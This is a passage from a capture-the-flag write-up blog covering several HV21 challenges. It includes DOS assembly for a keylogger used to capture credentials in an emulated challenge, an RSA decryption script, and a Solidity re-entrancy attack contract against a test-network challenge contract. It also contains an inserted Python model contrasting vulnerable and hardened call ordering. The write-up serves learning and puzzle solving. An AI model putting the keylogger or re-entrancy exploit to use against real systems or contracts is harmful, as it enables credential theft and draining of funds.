offset new_28h\n\t\tint   \t21h\n\t\tmov\tax, 3521h\t\t;Get old21h handler\n\t\tint\t21h\n\t\tmov\tcs:old_21_offset, bx\n\t\tmov\tcs:old_21_segment, es\n\t\tmov   \tax, 2521h\t\t;Set new 21h handler\n\t\tmov   \tdx, offset new_21h\n\t\tint   \t21h\n\t\tcall  \tcreate_log_file\n\t\tmov   \tdx, offset ok_installed\n\t\tmov   \tah, 09h\n\t\tint   \t21h\n\t\t;mov     dx, offset 
real_start   ;TSR\n\t\t;int     27h\n                mov       dx, offset real_start\n                mov       cl, 4\n                shr       dx, cl\n                add       dx, 111h\n                mov       ax, 3100h\n                int       21h\ncreate_log_file:\n\t\tmov   \tax, 3D01h\t;Try to open file\n\t\tlea   \tdx, logfile\n\t\tint   \t21h\n\t\tmov   \thandle, ax\n\t\tjnc   \tclog4\nclog3:\n\t\tmov\tah, 3Ch         ;Create new file if not opened\n\t\tmov\tcx, 02h\n\t\tlea\tdx, logfile\n\t\tint\t21h\n\t\tmov\thandle, ax\nclog4:\n\t\tmov\tbx, handle      ;Remember file handle\n\t\tmov\tah, 3Eh\t\t;Close file\n\t\tint\t21h\n\t\tret\nalready_inst:\n\t\tmov\tdx, offset already_msg\n\t\tmov\tah, 09h\n\t\tint\t21h\n\t\tjmp\texit\nexit:\n\t\tint\t20h\nok_installed\tdb 'KEYLOG successful installed$'\nalready_msg\tdb 'KEYLOG already installed$'\nend\tStart<\/pre>\n\n\n\n<p>We use <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/open-watcom\/open-watcom-v2\" target=\"_blank\">Open Watcom v2<\/a> to compile the code. 
These two links were also helpful for using Watcom:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/wiki.archlinux.org\/title\/Open_Watcom\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/wiki.archlinux.org\/title\/Open_Watcom<\/a><\/li>\n\n\n\n<li><a href=\"http:\/\/ptspts.blogspot.com\/2020\/04\/openwatcom-exeprog.html\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/ptspts.blogspot.com\/2020\/04\/openwatcom-exeprog.html<\/a><\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ wasm keylogger.asm\n$ wlink sys dos com name keylogger.com file keylogger.o\n$ mkdir img; sudo mount -o loop fdb.img img\n$ cp keylogger.com img\/k.com\n$ cat init.bat\nb:\nk.com\n$ sudo umount img<\/pre>\n\n\n\n<p>Now we can upload the fdb.img to the website and wait until the routine has completed. Afterwards we should be able to download the fdb.img again, as the content has changed.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-79-1024x449.png\" alt=\"\" class=\"wp-image-1836\"\/><\/figure>\n\n\n\n<p>And voila, there is the file OUTPUT.TXT.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-80-1024x368.png\" alt=\"\" class=\"wp-image-1837\"\/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Step 2 &#8211; Decode scan codes<\/h3>\n\n\n\n<p>I didn&#8217;t find an automatic way to convert the scan codes to actual characters. Thus, I used this <a rel=\"noreferrer noopener\" href=\"http:\/\/cc.etsii.ull.es\/ftp\/antiguo\/TC\/AOA\/CH20\/Ch20.pdf\" target=\"_blank\">PDF file<\/a> to do it manually. 
I converted all the keystrokes and saved them in a text file.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">38 \t\t--&gt; ALT (DOWN)\n18 98 \t--&gt; O (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n19 99\t--&gt; P (DOWN, UP)\n04 84  \t--&gt; 3 (DOWN, UP)\n13 93 \t--&gt; R (DOWN, UP)\n38\t\t--&gt; ALT (DOWN)\n1e 9e \t--&gt; A (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n14 94\t--&gt; T (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n13 93 \t--&gt; R (DOWN, UP)\n1c 9c \t--&gt; ENTER (DOWN, UP)\n----\n1d\t\t--&gt; CTRL (DOWN)\n02 82 \t--&gt; 1! (DOWN, UP)\n9d \t\t--&gt; CTRL (UP)\n38 \t\t--&gt; ALT (DOWN)\n02 82 \t--&gt; 1! (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n38\t\t--&gt; ALT (DOWN)\n1f 9f \t--&gt; S (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n16 96\t--&gt; U (DOWN, UP)\n19 99\t--&gt; P (DOWN, UP)\n19 99  \t--&gt; P (DOWN, UP)\n12 92 \t--&gt; E (DOWN, UP)\n13 93 \t--&gt; R (DOWN, UP)\n2a\t\t--&gt; L-SHIFT (DOWN)\n39 b9\t--&gt; SPACE (DOWN, UP)\naa\t\t--&gt; L-SHIFT (UP)\n2a\t\t--&gt; L-SHIFT (DOWN)\n1f 9f \t--&gt; S (DOWN, UP)\naa \t\t--&gt; L-SHIFT (UP)\n12 92\t--&gt; E (DOWN, UP)\n2e ae\t--&gt; C (DOWN, UP)\n16 96 \t--&gt; U (DOWN, UP)\n13 93 \t--&gt; R (DOWN, UP)\n12 92\t--&gt; E (DOWN, UP)\n38 \t\t--&gt; ALT (DOWN)\n39 b9 \t--&gt; SPACE (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n19 99\t--&gt; P (DOWN, UP)\n38\t\t--&gt; ALT (DOWN)\n1e 9e \t--&gt; A (DOWN, UP)\nb8\t\t--&gt; ALT (UP)\n06 86 \t--&gt; 5% (DOWN, UP)\n06 86 \t--&gt; 5% (DOWN, UP)\n11 91\t--&gt; W (DOWN, UP)\n38 \t\t--&gt; ALT\n18 98 \t--&gt; O (DOWN, UP)\nb8 \t\t--&gt; ALT\n13 93 \t--&gt; R (DOWN, UP)\n20 a0 \t--&gt; D (DOWN, UP)\n38 \t\t--&gt; ALT\n03 83 \t--&gt; 2@ (DOWN, UP)\nb8 \t\t--&gt; ALT\n1d \t\t--&gt; CTRL (DOWN)\n05 85 \t--&gt; 4$ (DOWN, UP)\n9d \t\t--&gt; CTRL (UP)\n1d \t\t--&gt; CTRL\n09 89 \t--&gt; 8* (DOWN, UP)\n9d \t\t--&gt; CTRL\n17 97 \t--&gt; I (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n39 b9 \t--&gt; SPACE (DOWN, UP)\naa\t\t--&gt; LSHIFT\n23 a3\t--&gt; H (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n19 99 \t--&gt; P (DOWN, UP)\n12 
92\t--&gt; E (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n39 b9 \t--&gt; SPACE (DOWN, UP)\naa\t\t--&gt; LSHIFT\n17 97 \t--&gt; I (DOWN, UP)\n14 94  \t--&gt; T (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n2b ab \t--&gt; \\| (DOWN, UP)\naa \t\t--&gt; LSHIFT\n1f 9f \t--&gt; S (DOWN, UP)\n2a\t\t--&gt; LSHIFT\n35 b5 \t--&gt; \/? (DOWN, UP)\naa \t\t--&gt; LSHIFT\n26 a6 \t--&gt; L (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n31 b1\t--&gt; N (DOWN, UP)\n22 a2 \t--&gt; G (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n35 b5 \t--&gt; \/? (DOWN, UP)\naa \t\t--&gt; LSHIFT\n12 92\t--&gt; E (DOWN, UP)\n31 b1 \t--&gt; N (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n16 96\t--&gt; U (DOWN, UP)\n22 a2\t--&gt; G (DOWN, UP)\n23 a3 \t--&gt; H (DOWN, UP)\n14 94\t--&gt; T (DOWN, UP)\n1d\t\t--&gt; CTRL\n06 86 \t--&gt; 5% (DOWN, UP)\n9d\t\t--&gt; CTRL<\/pre>\n\n\n\n<p>There are many special characters in the username and password, which I never could have entered manually myself. Fortunately, the compatmonitor in QEMU provides the &#8220;sendkey&#8221; command.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-81-1024x996.png\" alt=\"\" class=\"wp-image-1838\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-82-1024x852.png\" alt=\"\" class=\"wp-image-1839\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{hack1ng_l1ke_th3_90s}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.20] Trolling Crypto Elves<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-37.png\" alt=\"\" class=\"wp-image-1738\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>ice<\/em>. 
Don&#8217;t break everything!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves have been back to school and now they&#8217;re trolling Santa. They&#8217;ve encrypted a message and are challenging him to decrypt it. Of course Santa doesn&#8217;t want to look stupid, so he&#8217;s asking you for help.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Would you mind decrypting&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/59de7b83-a1ed-4fee-98ed-40218a6673c5.zip\" target=\"_blank\" rel=\"noreferrer noopener\">the message<\/a>&nbsp;and letting Santa know what&#8217;s in it? You&#8217;ll get a cookie in return (well, a flag-shaped one, but aren&#8217;t those the best?).<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>We get a public key and an encrypted message, stored in a binary file. The public key is an RSA key with a weird exponent of 4242.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-84-1024x556.png\" alt=\"\" class=\"wp-image-1843\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-83-1024x489.png\" alt=\"\" class=\"wp-image-1842\"\/><\/figure>\n\n\n\n<p>Looks like we have to do the RSA calculation ourselves. 
Once again, I googled for similar CTF challenges and found these two interesting posts:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"http:\/\/hacktracking.blogspot.com\/2013\/11\/cscamp-ctf-quals-2k13-crypto-public-is.html\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/hacktracking.blogspot.com\/2013\/11\/cscamp-ctf-quals-2k13-crypto-public-is.html<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/VulnHub\/ctf-writeups\/blob\/master\/2015\/eko-party-pre-ctf\/rsa-2070.md\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/VulnHub\/ctf-writeups\/blob\/master\/2015\/eko-party-pre-ctf\/rsa-2070.md<\/a><\/li>\n<\/ul>\n\n\n\n<p>We are already given n (modulus), e (exponent), and c (the encrypted message). We still need p &amp; q to calculate everything else.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">n = p*q<\/pre>\n\n\n\n<p>RSA is built on the factorization problem, so we should not be able to get p &amp; q from n alone. However, the website factordb.com holds pre-calculated factorizations. <a rel=\"noreferrer noopener\" href=\"http:\/\/factordb.com\/index.php?query=21841229176641676811074222222429036686010157493819478906104756224784026782720095285562077658175994506814988868039420867464335127876647084137268626334223518969271953762934538192829593027351087506564856372252764608983654907443877304590598039308085484230387424168108589912364744981715047690934796624671825840761147121835935311518027061488285356813614197767377798508227633097728683793773240697883725855674919223272992158621864652379194787743287739980453395882286994644048503221607873267720518809023683802183778543479285200786684047572628386266548042179603137730815862594760654189158575192864779821225861303652435417736529\" target=\"_blank\">Let&#8217;s see if we find the primes for our n<\/a>. There is a factorization available! p &amp; q are even the same number. 
We now have the following:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">- n: 21841229176641676811074222222429036686010157493819478906104756224784026782720095285562077658175994506814988868039420867464335127876647084137268626334223518969271953762934538192829593027351087506564856372252764608983654907443877304590598039308085484230387424168108589912364744981715047690934796624671825840761147121835935311518027061488285356813614197767377798508227633097728683793773240697883725855674919223272992158621864652379194787743287739980453395882286994644048503221607873267720518809023683802183778543479285200786684047572628386266548042179603137730815862594760654189158575192864779821225861303652435417736529\n- e: 4242\n- p: 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977\n- q: 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977<\/pre>\n\n\n\n<p>Unfortunately, the standard calculation examples for this problem don&#8217;t work. 
This is because the challenge has two special cases.<br>1) p == q <br>Solution --&gt; phi = p * (p - 1) instead of phi = (p - 1)(q - 1)<\/p>\n\n\n\n<p>2) gcd(phi_n, e) != 1 <br>Solution --&gt; can be found here: <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/HackThisSite\/CTF-Writeups\/blob\/master\/2017\/EasyCTF\/RSA%204\/README.md\" target=\"_blank\">https:\/\/github.com\/HackThisSite\/CTF-Writeups\/blob\/master\/2017\/EasyCTF\/RSA%204\/README.md<\/a><\/p>\n\n\n\n<p>We have now collected all the puzzle pieces to solve the challenge. The final script is:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from Crypto.Util.number import long_to_bytes\nfrom Crypto.PublicKey import RSA\nimport gmpy2\nimport base64\n'''\nSupporting blog posts:\n- http:\/\/hacktracking.blogspot.com\/2013\/11\/cscamp-ctf-quals-2k13-crypto-public-is.html\n- https:\/\/github.com\/VulnHub\/ctf-writeups\/blob\/master\/2015\/eko-party-pre-ctf\/rsa-2070.md\n'''\npublic_key ='''-----BEGIN PUBLIC KEY-----\nMIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEArQQPi5eDjcWTz\/cZToY9\nV9WjmbvvbN7P3W2NTdAYCd7EryshptEUsPdXbeTHrWObEROG0ZMrGFrWY4G33sXN\nZsdZ\/AYwRSfQdH2bA5nqrTWIcxJRiDShBgD\/w99BYqJH+d7qpPbRGdJJWYYQN1LJ\nXLdUyZvH4VTQMq7wbu+Gly9NUxaTVpDTgm3PSBfjiBIcWBy7yGI1VU2Leuf0Ik+4\nystrTn4CgFKbyTxBEAB9f2kvemePqH2w2\/9lkHJF9zDGp4MrWcA+1GOQjjYl5cM8\n3xd\/eZh04GglIS4cbNt4jHma0SfivbemNOMOgW9lAbItIZvD\/1s2lrOZE2jd7zWl\nUQICEJI=\n-----END PUBLIC KEY-----'''\nencrypted_message = 
'''CRb31iikjWfVXYQI7K6WffS2XIpticw4+a7d8CY+9SHNdO3GysZo2U3NJ6bKoPe5\/OWj8NwoYU\/M\njp8GrJ9ZXiUg1V+sGnXJIuU\/hPIHWWsYiAzxyO1XLJ+rDr6PU6e3e3rBn9weat9ovt8dqtxsqNKt\naXgmjt+XEwf9\/4rL0kJfWdSh\/qi3ITu42AnRMjeZitPb2bwpYhbl\/3zT3sn6pJBtgeKKmYdjrNYs\nZMwJZvkjw75GwzVl2JIuMzHBVwgX2Ca6B6oyccINYrqZOlvex8k3TLqBTLAk3ls7nxVILEQcLtLh\n5\/ORI1OFb1Lj46dIyn0ZTdvkrDjo2\/ruhT5btQ=='''\npubkey = RSA.importKey(public_key)\np = 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977\nq = 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977\nc = int.from_bytes(base64.b64decode(encrypted_message), 'big')\nn = pubkey.n\ne = pubkey.e\nprint(\"[+] Got values:\")\nprint(\"- n: \" + str(n))\nprint(\"- e: \" + str(e))\nprint(\"- p: \" + str(p))\nprint(\"- q: \" + str(q))\n# phi = (p-1)*(q-1) only holds for distinct primes; when p = q then n = p^2 and phi = p*(p-1)\nphi = p * (p - 1)\n# e has no inverse mod phi because g = gcd(e, phi) != 1,\n# so we invert e\/g instead: c^d mod n is then m^g mod n\ng = gmpy2.gcd(e, phi)\ne \/\/= g\nd = gmpy2.invert(e, phi)\nm = pow(c, d, n)\n# the integer g-th root only recovers m if m^g &lt; n (no modular wrap-around)\nm, exact = gmpy2.iroot(m, g)\nassert exact, \"m^g wrapped around n, the integer root does not apply\"\nprint(\"----\")\nprint(\"[!!] 
\" + str(long_to_bytes(m)))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-85-1024x302.png\" alt=\"\" class=\"wp-image-1844\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{F3M4TS L1TTL3 TH30R3M}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.21] Re-Entry to Nice List<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-38.png\" alt=\"\" class=\"wp-image-1739\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>HaCk0<\/em>. For sure on the nice list!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves are going web3! Also, Santa needs money to produce the toys (did you really think anything is for free?!). In order not be a boomer and to raise more than the&nbsp;<em>ConstitutionDAO<\/em>, he tasked his elves with creating a smart contract for people to buy into the nice list.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-39-1024x577.png\" alt=\"\" class=\"wp-image-1740\"\/><\/figure>\n\n\n\n<p>Unfortunately, the elves weren&#8217;t up to the task and only were able to put the deeds counter on to the blockchain. You have to submit one good deed per month to get on to the nice list.<\/p>\n\n\n\n<p>Unluckily for you, Christmas is in a few days and you can only submit 1 deed per month (or in blockchain terms: every 172800 blocks). 
Or can you get your counter to 0 in time?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Contract address:&nbsp;<code>0x82Ff67Ed282eFdeBcE2BA1176d65f39762Ce1cc5<\/code><\/li>\n\n\n\n<li>Network used: Ethereum Rinkeby (Test Network)<\/li>\n\n\n\n<li>Create a Wallet: use the&nbsp;<em>metamask<\/em>&nbsp;browser extension\n<ul class=\"wp-block-list\">\n<li>If you&#8217;ve already connected to the server before installing, reload your page.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Get some ETH at e.g.\n<ul class=\"wp-block-list\">\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/faucets.chain.link\/rinkeby\" target=\"_blank\">https:\/\/faucets.chain.link\/rinkeby<\/a><\/li>\n\n\n\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/faucet.rinkeby.io\/\" target=\"_blank\">https:\/\/faucet.rinkeby.io\/<\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Another Blockchain challenge, I solved this one as second \\o\/. Did I mention that I like Blockchain challenges? \ud83d\ude09 Once again, I worked with the remix application and Metamask. 
<\/p>\n\n\n\n<p>Once connected to Metamask the challenge website looks like this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"672\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-1024x672.png\" alt=\"\" class=\"wp-image-1847\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-1024x672.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-300x197.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-768x504.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86.png 1206w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>On <a href=\"https:\/\/rinkeby.etherscan.io\/address\/0x82ff67ed282efdebce2ba1176d65f39762ce1cc5#code\" target=\"_blank\" rel=\"noreferrer noopener\">etherscan.io<\/a> we can find the source code of the challenge contract. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pragma solidity 0.8.0;\ncontract SantasList {\n    mapping(address => uint256) naughtyList;\n    mapping(address => uint256) nextGoodDeedAfter;\n    function start() public {\n        naughtyList[tx.origin] = 12;\n        nextGoodDeedAfter[tx.origin] = 0;\n    }\n    function goodDeed() public {\n        require(\n            nextGoodDeedAfter[tx.origin] &lt; block.number,\n            \"You have already done your good deed this month\"\n        );\n        if (naughtyList[tx.origin] > 0) {\n            naughtyList[tx.origin] = naughtyList[tx.origin] - 1;\n            (bool success, ) = msg.sender.call(\"\");\n            require(success, \"Call failed\");\n            nextGoodDeedAfter[tx.origin] = block.number + 172800;\n        }\n    }\n    function goodDeedsLeft(address _address) public 
view returns (uint256) {\n        return naughtyList[_address];\n    }\n    function isNice(address _address) public view returns (bool) {\n        if(nextGoodDeedAfter[_address] > 0 &amp;&amp; naughtyList[_address] == 0) {\n            return true;\n        } else {\n            return false;\n        }\n    }\n}<\/pre>\n\n\n\n<p>The goal of the challenge is to get on to the Nice-List. But we can only report 1 good deed per month. According to the challenge description it is very clear that it has something to do with the <a rel=\"noreferrer noopener\" href=\"https:\/\/www.coindesk.com\/learn\/2016\/06\/25\/understanding-the-dao-attack\/\" target=\"_blank\">DAO hack<\/a>. <\/p>\n\n\n\n<p>Indeed, if we look closer at the source code of the smart contract we can see that there is a <a rel=\"noreferrer noopener\" href=\"https:\/\/consensys.github.io\/smart-contract-best-practices\/known_attacks\/\" target=\"_blank\">Re-Entrancy vulnerability<\/a> in the goodDeed() function. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">function goodDeed() public {\n        require(\n            nextGoodDeedAfter[tx.origin] &lt; block.number,\n            \"You have already done your good deed this month\"\n        );\n        if (naughtyList[tx.origin] > 0) {\n            naughtyList[tx.origin] = naughtyList[tx.origin] - 1;\n            (bool success, ) = msg.sender.call(\"\");\n            require(success, \"Call failed\");\n            nextGoodDeedAfter[tx.origin] = block.number + 172800;\n        }\n    }<\/pre>\n\n\n\n<p>Before &#8220;nextGoodDeedAfter&#8221; is set to block.number + 172800 we have the call to the sender, meaning us\/attacker, of the contract: (bool success, ) = msg.sender.call(&#8220;&#8221;). <\/p>\n\n\n\n<p>Thus, we can create a smart contract on our own. 
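<\/p>

<p>The ordering problem just described, as a Python model of the goodDeed() logic with the original order next to a checks-effects-interactions order. This is an added example, not the challenge contract or the author's code; SantasListModel, PlainCaller, ReenteringCaller and simulate are hypothetical names, and the block height and account name are constructed.<\/p>

```python
BLOCKS_PER_MONTH = 172800            # cooldown used by the challenge contract


class Revert(Exception):
    '''A failed require(): the state changes of the failing call are rolled back.'''


class SantasListModel:
    '''Python model of SantasList; hardened selects the order inside good_deed().'''

    def __init__(self, hardened):
        self.hardened = hardened
        self.block_number = 1000     # constructed block height
        self.naughty = {}
        self.next_after = {}

    def _snapshot(self):
        return dict(self.naughty), dict(self.next_after)

    def _restore(self, snapshot):
        self.naughty, self.next_after = dict(snapshot[0]), dict(snapshot[1])

    def start(self, origin):
        self.naughty[origin] = 12
        self.next_after[origin] = 0

    def is_nice(self, origin):
        return self.next_after[origin] > 0 and self.naughty[origin] == 0

    def _call_sender(self, origin, sender):
        # Models (bool success, ) = msg.sender.call(''): a revert inside the callee
        # undoes the callee's changes and comes back as success == False.
        snapshot = self._snapshot()
        try:
            sender.on_call(self, origin)
            return True
        except Revert:
            self._restore(snapshot)
            return False

    def good_deed(self, origin, sender):
        if not self.next_after[origin] < self.block_number:
            raise Revert('You have already done your good deed this month')
        if self.naughty[origin] > 0:
            self.naughty[origin] -= 1
            if self.hardened:
                # effects before interaction: cooldown is set before control leaves
                self.next_after[origin] = self.block_number + BLOCKS_PER_MONTH
            if not self._call_sender(origin, sender):
                raise Revert('Call failed')
            if not self.hardened:
                # order on the page: cooldown is written after the external call
                self.next_after[origin] = self.block_number + BLOCKS_PER_MONTH

    def transact(self, origin, sender):
        '''One transaction: either every change is kept or none is.'''
        snapshot = self._snapshot()
        try:
            self.good_deed(origin, sender)
            return True
        except Revert:
            self._restore(snapshot)
            return False


class PlainCaller:
    '''A caller that does nothing when it is called back.'''

    def on_call(self, contract, origin):
        pass


class ReenteringCaller:
    '''A caller whose callback invokes good_deed() again, like the contract on the page.'''

    def on_call(self, contract, origin):
        contract.good_deed(origin, self)


def simulate(hardened, reentering):
    '''Return (transaction ok, deeds left, on the nice list) after one transaction.'''
    contract = SantasListModel(hardened)
    contract.start('alice')                      # constructed account name
    sender = ReenteringCaller() if reentering else PlainCaller()
    ok = contract.transact('alice', sender)
    return ok, contract.naughty['alice'], contract.is_nice('alice')


if __name__ == '__main__':
    for hardened in (False, True):
        for reentering in (False, True):
            print(hardened, reentering, simulate(hardened, reentering))
```

<p>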
We implement the receive() and fallback() functions, which run when the contract is called and no function is selected. That is exactly what happens with &#8220;msg.sender.call(\"\")&#8221;. In these functions we recursively call the goodDeed() function of the challenge contract. Now we have a recursive loop: the challenge contract calls our own contract, which calls the challenge contract again before it can set the limitation. Here is my smart contract to solve this challenge:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/**\n *\n * DAO Hack - Re-Entrancy vulnerability, more details here:\n * - https:\/\/vessenes.com\/more-ethereum-attacks-race-to-empty-is-the-real-deal\/\n * - https:\/\/medium.com\/coinmonks\/ethernaut-lvl-10-re-entrancy-walkthrough-how-to-abuse-execution-ordering-and-reproduce-the-dao-7ec88b912c14\n * - https:\/\/consensys.github.io\/smart-contract-best-practices\/known_attacks\/\n *\n * Executed and deployed with remix:\n * - https:\/\/remix.ethereum.org\/\n *\n *\/\npragma solidity ^0.8.10;\n\/**\n * Interface to Santa Contract:\n * - https:\/\/rinkeby.etherscan.io\/address\/0x82Ff67Ed282eFdeBcE2BA1176d65f39762Ce1cc5#code\n *\/\ninterface SantasList{\n    function start() external;\n    function goodDeed() external;\n    function goodDeedsLeft(address _address) external view returns (uint256);\n    function isNice(address _address) external view returns (bool);\n}\ncontract AttackHV21 {\n    address constant santa = 0x82Ff67Ed282eFdeBcE2BA1176d65f39762Ce1cc5;\n    SantasList sl;\n    constructor() {\n        sl = SantasList(santa);\n    }\n    function start() public {\n        sl.start();\n    }\n    function attack() public {\n        sl.goodDeed();\n    }\n    function checkNice() public view returns (bool) {\n        return 
sl.isNice(msg.sender);\n    }\n    function checkDeeds() public view returns (uint256) {\n        return sl.goodDeedsLeft(msg.sender);\n    }\n    function getAddress() public view returns(address){\n        return msg.sender;\n    }\n    \/**\n     * These functions execute the attack - not sure which one is called though\n     *\n     * The vulnerable contract calls msg.sender.call(\"\") before the time limit for the next good deed is set.\n     * We can use this vulnerability and recursively call goodDeed, when the contract calls us.\n     * Until we are on the nice list\n     *\/\n    receive() external payable{\n        uint count = 0;\n        if (count &lt;= 12) {\n            sl.goodDeed();\n            count++;\n        }\n    }\n    fallback() external payable{\n        uint count = 0;\n        if (count &lt;= 12) {\n            sl.goodDeed();\n            count++;\n        }\n    }\n}<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"512\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-1024x512.png\" alt=\"\" class=\"wp-image-1848\" 